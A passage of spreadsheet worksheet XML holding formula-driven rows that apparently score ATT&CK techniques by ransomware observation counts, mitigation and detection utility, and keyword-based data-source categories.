      <c r="T546" s="57"/>
      <c r="U546" s="57">
        <v>0</v>
      </c>
      <c r="V546" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W546" s="37">
        <v>0</v>
      </c>
      <c r="X546" s="37">
        <v>0</v>
      </c>
      <c r="Y546" s="37">
        <v>0</v>
      </c>
      <c r="Z546" s="37">
        <v>1</v>
      </c>
      <c r="AA546" s="37">
        <v>0.01</v>
      </c>
      <c r="AB546" s="37">
        <v>0.01</v>
      </c>
      <c r="AC546" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD546" s="50" t="s">
        <v>1849</v>
      </c>
      <c r="AE546" s="37" t="str" cm="1">
        <f t="array" ref="AE546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF546" s="37">
        <v>542</v>
      </c>
      <c r="AG546" s="37" t="str" cm="1">
        <f t="array" ref="AG546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH546" s="37">
        <v>542</v>
      </c>
      <c r="AI546" s="37" t="str" cm="1">
        <f t="array" ref="AI546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ546" s="37">
        <v>542</v>
      </c>
      <c r="AK546" s="37" t="str" cm="1">
        <f t="array" ref="AK546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL546" s="37">
        <v>542</v>
      </c>
      <c r="AM546" s="37" t="str" cm="1">
        <f t="array" ref="AM546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN546" s="37">
        <v>0</v>
      </c>
      <c r="AO546" s="37">
        <v>1</v>
      </c>
      <c r="AP546" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ546" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.592857142857142</v>
      </c>
      <c r="AR546" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS546" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT546" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU54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0.9664965986394557</v>
      </c>
    </row>
    <row r="547" spans="1:47" ht="34">
      <c r="A547" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B547" s="37">
        <f t="shared" si="8"/>
        <v>201.77857142857144</v>
      </c>
      <c r="C547" s="37" t="s">
        <v>1850</v>
      </c>
      <c r="D547" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E547" s="37" t="s">
        <v>1838</v>
      </c>
      <c r="F547" s="37">
        <v>0</v>
      </c>
      <c r="G547" s="37">
        <v>1</v>
      </c>
      <c r="H547" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I547" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J547" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K547" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L547" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M547" s="37">
        <v>0</v>
      </c>
      <c r="N547" s="56">
        <v>0</v>
      </c>
      <c r="O547" s="56">
        <v>7</v>
      </c>
      <c r="P547" s="56">
        <v>0</v>
      </c>
      <c r="Q547" s="56">
        <v>2</v>
      </c>
      <c r="R547" s="57"/>
      <c r="S547" s="57">
        <v>0</v>
      </c>
      <c r="T547" s="57"/>
      <c r="U547" s="57">
        <v>0</v>
      </c>
      <c r="V547" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W547" s="37">
        <v>0</v>
      </c>
      <c r="X547" s="37">
        <v>0</v>
      </c>
      <c r="Y547" s="37">
        <v>0</v>
      </c>
      <c r="Z547" s="37">
        <v>9</v>
      </c>
      <c r="AA547" s="37">
        <v>0.09</v>
      </c>
      <c r="AB547" s="37">
        <v>0.09</v>
      </c>
      <c r="AC547" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD547" s="50" t="s">
        <v>1839</v>
      </c>
      <c r="AE547" s="37" t="str" cm="1">
        <f t="array" ref="AE547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF547" s="37">
        <v>543</v>
      </c>
      <c r="AG547" s="37" t="str" cm="1">
        <f t="array" ref="AG547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH547" s="37">
        <v>543</v>
      </c>
      <c r="AI547" s="37" t="str" cm="1">
        <f t="array" ref="AI547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ547" s="37">
        <v>543</v>
      </c>
      <c r="AK547" s="37" t="str" cm="1">
        <f t="array" ref="AK547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL547" s="37">
        <v>543</v>
      </c>
      <c r="AM547" s="37" t="str" cm="1">
        <f t="array" ref="AM547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN547" s="37">
        <v>0</v>
      </c>
      <c r="AO547" s="37">
        <v>1</v>
      </c>
      <c r="AP547" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ547" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>67.259523809523813</v>
      </c>
      <c r="AR547" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS547" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT547" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU54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1.6252267573696144</v>
      </c>
    </row>
    <row r="548" spans="1:47" ht="17">
      <c r="A548" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B548" s="37">
        <f t="shared" si="8"/>
        <v>108.85000000000001</v>
      </c>
      <c r="C548" s="37" t="s">
        <v>1851</v>
      </c>
      <c r="D548" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E548" s="37" t="s">
        <v>1852</v>
      </c>
      <c r="F548" s="37">
        <v>0</v>
      </c>
      <c r="G548" s="37">
        <v>1</v>
      </c>
      <c r="H548" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I548" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J548" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K548" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L548" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M548" s="37">
        <v>0</v>
      </c>
      <c r="N548" s="56">
        <v>0</v>
      </c>
      <c r="O548" s="56">
        <v>0</v>
      </c>
      <c r="P548" s="56">
        <v>0</v>
      </c>
      <c r="Q548" s="56">
        <v>0</v>
      </c>
      <c r="R548" s="57"/>
      <c r="S548" s="57">
        <v>0</v>
      </c>
      <c r="T548" s="57"/>
      <c r="U548" s="57">
        <v>0</v>
      </c>
      <c r="V548" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W548" s="37">
        <v>0</v>
      </c>
      <c r="X548" s="37">
        <v>0</v>
      </c>
      <c r="Y548" s="37">
        <v>0</v>
      </c>
      <c r="Z548" s="37">
        <v>0</v>
      </c>
      <c r="AA548" s="37">
        <v>0</v>
      </c>
      <c r="AB548" s="37">
        <v>0</v>
      </c>
      <c r="AC548" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD548" s="50" t="s">
        <v>1842</v>
      </c>
      <c r="AE548" s="37" t="str" cm="1">
        <f t="array" ref="AE548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF548" s="37">
        <v>544</v>
      </c>
      <c r="AG548" s="37" t="str" cm="1">
        <f t="array" ref="AG548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH548" s="37">
        <v>544</v>
      </c>
      <c r="AI548" s="37" t="str" cm="1">
        <f t="array" ref="AI548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ548" s="37">
        <v>544</v>
      </c>
      <c r="AK548" s="37" t="str" cm="1">
        <f t="array" ref="AK548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL548" s="37">
        <v>544</v>
      </c>
      <c r="AM548" s="37" t="str" cm="1">
        <f t="array" ref="AM548">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD548)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN548" s="37">
        <v>0</v>
      </c>
      <c r="AO548" s="37">
        <v>1</v>
      </c>
      <c r="AP548" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ548" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>36.283333333333339</v>
      </c>
      <c r="AR548" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS548" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT548" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU54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0.88769841269841276</v>
      </c>
    </row>
    <row r="549" spans="1:47" ht="17">
      <c r="A549" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B549" s="37">
        <f t="shared" si="8"/>
        <v>129.82142857142858</v>
      </c>
      <c r="C549" s="37" t="s">
        <v>1853</v>
      </c>
      <c r="D549" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E549" s="37" t="s">
        <v>1841</v>
      </c>
      <c r="F549" s="37">
        <v>0</v>
      </c>
      <c r="G549" s="37">
        <v>1</v>
      </c>
      <c r="H549" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I549" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J549" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K549" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L549" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M549" s="37">
        <v>0</v>
      </c>
      <c r="N549" s="56">
        <v>0</v>
      </c>
      <c r="O549" s="56">
        <v>0</v>
      </c>
      <c r="P549" s="56">
        <v>0</v>
      </c>
      <c r="Q549" s="56">
        <v>2</v>
      </c>
      <c r="R549" s="57"/>
      <c r="S549" s="57">
        <v>0</v>
      </c>
      <c r="T549" s="57"/>
      <c r="U549" s="57">
        <v>0</v>
      </c>
      <c r="V549" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W549" s="37">
        <v>0</v>
      </c>
      <c r="X549" s="37">
        <v>0</v>
      </c>
      <c r="Y549" s="37">
        <v>0</v>
      </c>
      <c r="Z549" s="37">
        <v>2</v>
      </c>
      <c r="AA549" s="37">
        <v>0.02</v>
      </c>
      <c r="AB549" s="37">
        <v>0.02</v>
      </c>
      <c r="AC549" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD549" s="50" t="s">
        <v>1842</v>
      </c>
      <c r="AE549" s="37" t="str" cm="1">
        <f t="array" ref="AE549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF549" s="37">
        <v>545</v>
      </c>
      <c r="AG549" s="37" t="str" cm="1">
        <f t="array" ref="AG549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH549" s="37">
        <v>545</v>
      </c>
      <c r="AI549" s="37" t="str" cm="1">
        <f t="array" ref="AI549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ549" s="37">
        <v>545</v>
      </c>
      <c r="AK549" s="37" t="str" cm="1">
        <f t="array" ref="AK549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL549" s="37">
        <v>545</v>
      </c>
      <c r="AM549" s="37" t="str" cm="1">
        <f t="array" ref="AM549">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD549)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN549" s="37">
        <v>0</v>
      </c>
      <c r="AO549" s="37">
        <v>2</v>
      </c>
      <c r="AP549" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ549" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>43.273809523809526</v>
      </c>
      <c r="AR549" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS549" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT549" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU54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2.1082766439909295</v>
      </c>
    </row>
    <row r="550" spans="1:47" ht="34">
      <c r="A550" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B550" s="37">
        <f t="shared" si="8"/>
        <v>109.25</v>
      </c>
      <c r="C550" s="37" t="s">
        <v>1854</v>
      </c>
      <c r="D550" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E550" s="37" t="s">
        <v>1844</v>
      </c>
      <c r="F550" s="37">
        <v>0</v>
      </c>
      <c r="G550" s="37">
        <v>1</v>
      </c>
      <c r="H550" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I550" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J550" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K550" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L550" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M550" s="37">
        <v>0</v>
      </c>
      <c r="N550" s="56">
        <v>0</v>
      </c>
      <c r="O550" s="56">
        <v>0</v>
      </c>
      <c r="P550" s="56">
        <v>0</v>
      </c>
      <c r="Q550" s="56">
        <v>0</v>
      </c>
      <c r="R550" s="57"/>
      <c r="S550" s="57">
        <v>0</v>
      </c>
      <c r="T550" s="57"/>
      <c r="U550" s="57">
        <v>0</v>
      </c>
      <c r="V550" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W550" s="37">
        <v>0</v>
      </c>
      <c r="X550" s="37">
        <v>0</v>
      </c>
      <c r="Y550" s="37">
        <v>0</v>
      </c>
      <c r="Z550" s="37">
        <v>0</v>
      </c>
      <c r="AA550" s="37">
        <v>0</v>
      </c>
      <c r="AB550" s="37">
        <v>0</v>
      </c>
      <c r="AC550" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD550" s="50" t="s">
        <v>1855</v>
      </c>
      <c r="AE550" s="37" t="str" cm="1">
        <f t="array" ref="AE550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF550" s="37">
        <v>546</v>
      </c>
      <c r="AG550" s="37" t="str" cm="1">
        <f t="array" ref="AG550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH550" s="37">
        <v>546</v>
      </c>
      <c r="AI550" s="37" t="str" cm="1">
        <f t="array" ref="AI550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ550" s="37">
        <v>546</v>
      </c>
      <c r="AK550" s="37" t="str" cm="1">
        <f t="array" ref="AK550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL550" s="37">
        <v>546</v>
      </c>
      <c r="AM550" s="37" t="str" cm="1">
        <f t="array" ref="AM550">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD550)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN550" s="37">
        <v>0</v>
      </c>
      <c r="AO550" s="37">
        <v>1</v>
      </c>
      <c r="AP550" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ550" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>36.416666666666664</v>
      </c>
      <c r="AR550" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS550" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT550" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU55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0.89087301587301582</v>
      </c>
    </row>
    <row r="551" spans="1:47" ht="17">
      <c r="A551" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B551" s="37">
        <f t="shared" si="8"/>
        <v>109.45</v>
      </c>
      <c r="C551" s="37" t="s">
        <v>1856</v>
      </c>
      <c r="D551" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E551" s="37" t="s">
        <v>1846</v>
      </c>
      <c r="F551" s="37">
        <v>0</v>
      </c>
      <c r="G551" s="37">
        <v>1</v>
      </c>
      <c r="H551" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I551" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J551" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K551" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L551" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M551" s="37">
        <v>0</v>
      </c>
      <c r="N551" s="56">
        <v>0</v>
      </c>
      <c r="O551" s="56">
        <v>0</v>
      </c>
      <c r="P551" s="56">
        <v>0</v>
      </c>
      <c r="Q551" s="56">
        <v>0</v>
      </c>
      <c r="R551" s="57"/>
      <c r="S551" s="57">
        <v>0</v>
      </c>
      <c r="T551" s="57"/>
      <c r="U551" s="57">
        <v>0</v>
      </c>
      <c r="V551" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W551" s="37">
        <v>0</v>
      </c>
      <c r="X551" s="37">
        <v>0</v>
      </c>
      <c r="Y551" s="37">
        <v>0</v>
      </c>
      <c r="Z551" s="37">
        <v>0</v>
      </c>
      <c r="AA551" s="37">
        <v>0</v>
      </c>
      <c r="AB551" s="37">
        <v>0</v>
      </c>
      <c r="AC551" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD551" s="50"/>
      <c r="AE551" s="37" t="str" cm="1">
        <f t="array" ref="AE551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF551" s="37">
        <v>547</v>
      </c>
      <c r="AG551" s="37" t="str" cm="1">
